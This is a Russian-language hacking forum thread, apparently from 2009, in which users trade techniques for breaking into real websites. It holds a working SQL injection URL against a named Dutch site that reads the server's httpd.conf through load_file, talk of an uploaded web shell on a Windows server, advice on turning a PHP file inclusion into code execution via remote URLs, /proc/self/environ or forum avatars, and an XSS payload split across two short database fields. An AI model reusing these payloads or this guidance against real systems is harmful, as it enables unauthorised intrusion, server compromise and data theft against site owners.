Полный путь к папке доступной из Интернета знаешь? (document_root)
Если знаешь, выполни запрос:
Вот только может быть чмоды помешаеют.
а терь по полочкам:
1- Есть шелл на сайте
2- сайт 1 на сервере
3- сервер Windows NT SERVER 5.2 build 3790
4- есть доступ к бд
5- бд мускуль5
6- Править файлы не могу
7- могу заливать свои
вопрос к тебе Ctacok, нахуя ему еще один шел?
дооо, возможно просто тс невпонятках что такае задний проход ))
Последний раз редактировалось x[0]x; 04.12.2009 в 10:07..
прикол) я пробовал так...
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
и у меня нераскрылось) спасибо!
но к сожалению
/opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
Если allow_url_include, то
Код:
http://google.com/?
Если нет, то
Код:
/proc/self/environ
Или автарки форумов, и тд...
Об этом уже писалось тут...
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
Код:
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так: